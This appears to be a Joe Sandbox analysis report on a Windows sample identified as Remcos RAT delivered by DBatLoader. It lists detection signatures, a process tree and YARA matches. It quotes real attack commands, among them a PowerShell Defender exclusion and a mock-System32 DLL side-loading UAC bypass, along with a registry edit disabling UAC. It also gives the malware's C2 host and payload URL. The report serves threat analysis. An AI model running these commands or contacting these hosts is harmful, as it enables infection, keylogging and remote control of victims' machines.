Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0vJrK0NCd1.exe

Overview

General Information

Sample Name:0vJrK0NCd1.exe
Original Sample Name:8bf8b980381fd607ec9065bfbcd572973770ee77c815354a35455c10651516d5.exe
Analysis ID:1296068
MD5:533b3df0e597c50e1129ec807fd6bbcf
SHA1:0561fc6471cb5e2f0aa9e6b3e3fdfa9fd2586dbc
SHA256:8bf8b980381fd607ec9065bfbcd572973770ee77c815354a35455c10651516d5
Tags:exeRemcosRAT
Infos:

Detection

Remcos, DBatLoader, FloodFix
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Sigma detected: Remcos
Antivirus detection for dropped file
Found malware configuration
Yara detected FloodFix
Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Antivirus / Scanner detection for submitted sample
Yara detected DBatLoader
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Machine Learning detection for sample
Allocates memory in foreign processes
DLL side loading technique detected
Adds a directory exclusion to Windows Defender
Drops executables to the windows directory (C:\Windows) and starts them
Installs a global keyboard hook
Drops PE files with a suspicious file extension
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
PE file contains more sections than normal
Yara detected Keylogger Generic
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Found dropped PE file which has not been started or loaded
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports

Classification

Process Tree

  • System is w10x64
  • 0vJrK0NCd1.exe (PID: 6460 cmdline: C:\Users\user\Desktop\0vJrK0NCd1.exe MD5: 533B3DF0E597C50E1129EC807FD6BBCF)
    • cmd.exe (PID: 5296 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ElpuxpkiO.bat" " MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 2280 cmdline: cmd.exe /c mkdir "\\?\C:\Windows " MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • cmd.exe (PID: 6188 cmdline: cmd.exe /c mkdir "\\?\C:\Windows \System32" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • cmd.exe (PID: 6216 cmdline: cmd.exe /c ECHO F MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • xcopy.exe (PID: 6260 cmdline: xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y MD5: 9F3712DDC0D7FE3D75B8A06C6EE8E68C)
      • cmd.exe (PID: 6308 cmdline: cmd.exe /c ECHO F MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • xcopy.exe (PID: 6332 cmdline: xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y MD5: 9F3712DDC0D7FE3D75B8A06C6EE8E68C)
      • cmd.exe (PID: 6384 cmdline: cmd.exe /c ECHO F MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • xcopy.exe (PID: 6428 cmdline: xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y MD5: 9F3712DDC0D7FE3D75B8A06C6EE8E68C)
      • easinvoker.exe (PID: 6500 cmdline: C:\Windows \System32\easinvoker.exe MD5: 231CE1E1D7D98B44371FFFF407D68B59)
        • cmd.exe (PID: 6548 cmdline: C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat"" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6668 cmdline: cmd.exe /c start /min powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
            • powershell.exe (PID: 6728 cmdline: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: 95000560239032BC68B4C2FDFCDEF913)
              • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6740 cmdline: ping 127.0.0.1 -n 6 MD5: 70C24A306F768936563ABDADB9CA9108)
    • colorcpl.exe (PID: 6224 cmdline: C:\Windows\System32\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
  • Elpuxpki.PIF (PID: 3436 cmdline: "C:\Users\Public\Libraries\Elpuxpki.PIF" MD5: 533B3DF0E597C50E1129EC807FD6BBCF)
    • SndVol.exe (PID: 5180 cmdline: C:\Windows\System32\SndVol.exe MD5: 1EF1A9B89A984DD25DB61DC1AF2548B8)
  • Elpuxpki.PIF (PID: 4672 cmdline: "C:\Users\Public\Libraries\Elpuxpki.PIF" MD5: 533B3DF0E597C50E1129EC807FD6BBCF)
    • colorcpl.exe (PID: 5372 cmdline: C:\Windows\System32\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "lart.ydns.eu:1984:1", "Assigned name": "Greatzillart", "Copy file": "remcos.exe", "Mutex": "Rmc-QBZ2IM", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Threatname: DBatLoader

{"Download Url": "https://balkancelikdovme.com/work/Elpuxpkilck"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
0vJrK0NCd1.exeJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Program Files\Common Files\system\symsrv.dllJoeSecurity_FloodFixYara detected FloodFixJoe Security
      C:\Program Files\Common Files\system\symsrv.dllMALWARE_Win_FloodFixDetects FloodFixditekSHen
        C:\Program Files\Common Files\system\symsrv.dllMAL_Floxif_GenericDetects Floxif MalwareFlorian Roth
          C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmpMalware_Floxif_mpsvc_dllMalware - FloxifFlorian Roth
          • 0x8068:$op1: 04 80 7A 03 01 75 04 8D 42 04 C3 8D 42 04 53 8B
          • 0x8088:$op2: 88 19 74 03 41 EB EA C6 42 03 01 5B C3 8B 4C 24
          • 0x97ec:$op3: FF 03 8D 00 F9 FF FF 88 01 EB A1
          • 0x9854:$op3: FF 03 8D 00 F9 FF FF 88 01 EB A1
          C:\Users\Public\Libraries\Elpuxpki.PIFJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
                00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x6c4c0:$a1: Remcos restarted by watchdog!
                • 0x6ca38:$a3: %02i:%02i:%02i:%03i
                00000026.00000002.564309116.0000000000608000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    Click to see the 24 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    35.2.SndVol.exe.3300000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      35.2.SndVol.exe.3300000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                        35.2.SndVol.exe.3300000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                        • 0x657e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                        • 0x6577c:$s1: CoGetObject
                        • 0x65790:$s1: CoGetObject
                        • 0x657ac:$s1: CoGetObject
                        • 0x6f738:$s1: CoGetObject
                        • 0x6573c:$s2: Elevation:Administrator!new:
                        35.2.SndVol.exe.3300000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                        • 0x6b8a8:$a1: Remcos restarted by watchdog!
                        • 0x6be20:$a3: %02i:%02i:%02i:%03i
                        35.2.SndVol.exe.3300000.0.unpackREMCOS_RAT_variantsunknownunknown
                        • 0x658fc:$str_a1: C:\Windows\System32\cmd.exe
                        • 0x65878:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                        • 0x65878:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                        • 0x65d78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                        • 0x665a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                        • 0x6596c:$str_b2: Executing file:
                        • 0x669ec:$str_b3: GetDirectListeningPort
                        • 0x66398:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                        • 0x66518:$str_b7: \update.vbs
                        • 0x65994:$str_b9: Downloaded file:
                        • 0x65980:$str_b10: Downloading file:
                        • 0x65a24:$str_b12: Failed to upload file:
                        • 0x669b4:$str_b13: StartForward
                        • 0x669d4:$str_b14: StopForward
                        • 0x66470:$str_b15: fso.DeleteFile "
                        • 0x66404:$str_b16: On Error Resume Next
                        • 0x664a0:$str_b17: fso.DeleteFolder "
                        • 0x65a14:$str_b18: Uploaded file:
                        • 0x659d4:$str_b19: Unable to delete:
                        • 0x66438:$str_b20: while fso.FileExists("
                        • 0x65eb1:$str_c0: [Firefox StoredLogins not found]
                        Click to see the 40 entries

                        Sigma Signatures

                        Stealing of Sensitive Information

                        barindex
                        Sigma detected: Remcos
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 6224, TargetFilename: C:\ProgramData\remcos\logs.dat

                        Snort Signatures

                        No Snort rule has matched

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for dropped file
                        Source: C:\Users\Public\Libraries\netutils.dllAvira: detection malicious, Label: TR/Starter.bwokf
                        Source: C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmpAvira: detection malicious, Label: W32/Floxif.iici
                        Source: C:\Windows \System32\netutils.dllAvira: detection malicious, Label: TR/Starter.bwokf
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFAvira: detection malicious, Label: W32/Floxif.hdc
                        Source: C:\Program Files\Common Files\system\symsrv.dllAvira: detection malicious, Label: TR/Floxif.BB
                        Found malware configuration
                        Source: 0vJrK0NCd1.exeMalware Configuration Extractor: DBatLoader {"Download Url": "https://balkancelikdovme.com/work/Elpuxpkilck"}
                        Source: 00000026.00000002.564309116.0000000000608000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "lart.ydns.eu:1984:1", "Assigned name": "Greatzillart", "Copy file": "remcos.exe", "Mutex": "Rmc-QBZ2IM", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                        Multi AV Scanner detection for submitted file
                        Source: 0vJrK0NCd1.exeReversingLabs: Detection: 92%
                        Source: 0vJrK0NCd1.exeVirustotal: Detection: 84%Perma Link
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000002.564309116.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.532520297.0000000000487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000002.637978823.0000000014C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 0vJrK0NCd1.exe PID: 6460, type: MEMORYSTR
                        Antivirus / Scanner detection for submitted sample
                        Source: 0vJrK0NCd1.exeAvira: detected
                        Multi AV Scanner detection for domain / URL
                        Source: balkancelikdovme.comVirustotal: Detection: 17%Perma Link
                        Multi AV Scanner detection for dropped file
                        Source: C:\Program Files\Common Files\system\symsrv.dllReversingLabs: Detection: 92%
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFReversingLabs: Detection: 92%
                        Source: C:\Users\Public\Libraries\netutils.dllReversingLabs: Detection: 73%
                        Source: C:\Windows \System32\netutils.dllReversingLabs: Detection: 73%
                        Machine Learning detection for sample
                        Source: 0vJrK0NCd1.exeJoe Sandbox ML: detected
                        Machine Learning detection for dropped file
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFJoe Sandbox ML: detected
                        Source: C:\Program Files\Common Files\system\symsrv.dllJoe Sandbox ML: detected
                        Source: 0vJrK0NCd1.exe, 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_073ef517-d

                        Exploits

                        barindex
                        Yara detected UAC Bypass using CMSTP
                        Source: Yara matchFile source: 35.2.SndVol.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.2.colorcpl.exe.2b50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.0vJrK0NCd1.exe.10030000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.SndVol.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.2.colorcpl.exe.2b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 0vJrK0NCd1.exe PID: 6460, type: MEMORYSTR
                        Source: 0vJrK0NCd1.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                        Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.3:49727 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.3:49736 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.3:49737 version: TLS 1.2
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeDirectory created: C:\Program Files\Common Files\System\symsrv.dllJump to behavior
                        Source: Binary string: wkernel32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.369193151.0000000002389000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ucrtbase.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.371315397.0000000002E66000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: msvcrt.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.371668032.0000000002E62000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wrpcrt4.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.371899566.0000000002E6D000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.368861068.0000000002D6A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: shcore.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.376605940.0000000002E65000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: bcryptprimitives.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.373786865.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wgdi32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.462920410.0000000002B60000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: fltLib.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.432534742.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.379261612.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: cfgmgr32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.396746922.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: shell32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wrpcrt4.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.371899566.0000000002E6D000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: crypt32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: CLBCatQ.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.386369418.0000000002E6E000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: msvcp_win.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.389810334.0000000003411000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wgdi32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.462920410.0000000002B60000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.393192241.0000000002B71000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.399135721.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.462920410.0000000002BAB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: easinvoker.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.444268222.000000007F0F0000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000002.469716889.0000000004F3C000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe
                        Source: Binary string: fastprox.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.385818708.0000000002E6E000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: easinvoker.pdbH source: 0vJrK0NCd1.exe, 00000000.00000003.444268222.000000007F0F0000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000002.469716889.0000000004F3C000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: %s\%.*s%s%s%s\%.*s (%s)%s%s.partialaction_closesearch_fieldsmartscreen_rowsmartscreen_oldclient_rowlistview_regionaction_clearaction_optionsaction_smartscreen_buttonsearch_glyphdownload_boxcuetextcleardownload_selectormaininetcore\ieframe\browseui\downloadmanager\downloadfilecopier.cpp.automaticdestinations-ms.bat.cab.cat.appx.appxbundle.appxpackage.customdestinations-ms.der.dmp.dsft.cdxml.cer.cmd.cookie.iso.jar.js.lnk.efi.etl.fon.ini.msp.msu.mui.nst.mp.mpb.msip.msm.p12.p7b.p7c.p7m.olb.ost.otf.p10.pem.pfm.pfx.ps1.p7r.p7s.p7x.pdb.psm1.pst.reg.rll.ps1xml.psc1.psd1.psf.sys.ttc.ttf.vbs.sft.spc.spkg.sst.vsi.vsix.wfs.wim.vhd.vhdx.vmcx.vmrsinetcore\ieframe\browseui\downloadmanager\downloadsecurity.cpp.winmd.wsf.xap source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wUxTheme.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.392885475.0000000003411000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: combase.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.372628723.0000000003414000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ucrtbase.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.371315397.0000000002E66000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: cryptbase.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.390086007.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.372135848.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: shell32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wuser32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.370202146.0000000002E65000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: fltLib.pdbGCTL source: 0vJrK0NCd1.exe, 00000000.00000003.432534742.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.379261612.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wgdi32full.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.370600881.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wgdi32full.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.370600881.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: shcore.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.376605940.0000000002E65000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ieframe.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wUxTheme.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.392885475.0000000003411000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.368861068.0000000002D6A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ole32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.373400653.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: fastprox.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.385818708.0000000002E6E000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: powrprof.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.398187463.0000000003411000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: powrprof.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.398187463.0000000003411000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: version.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.373786865.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: apphelp.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.370004681.00000000029B4000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ole32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.373400653.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: Windows.Storage.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.376967182.000000000341B000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: version.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.373786865.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdbGCTL source: 0vJrK0NCd1.exe, 00000000.00000003.369193151.0000000002389000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: comctl32v582.pdbGCTL source: 0vJrK0NCd1.exe, 00000000.00000003.373985159.0000000002E68000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: iertutil.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: comctl32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.382826553.0000000003418000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ieframe.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: msvcp_win.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.389810334.0000000003411000.00000004.00000020.00020000.00000000.sdmp
